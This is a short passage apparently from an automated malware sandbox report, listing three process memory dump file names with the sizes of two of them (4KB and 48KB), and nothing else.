                                                                                                                                            • memory/6088-336-0x00000000045B3000-0x00000000045B4000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              4KB

                                                                                                                                            • memory/6104-293-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                              Filesize

                                                                                                                                              48KB

                                                                                                                                            • memory/6104-294-0x0000000000402F68-mapping.dmp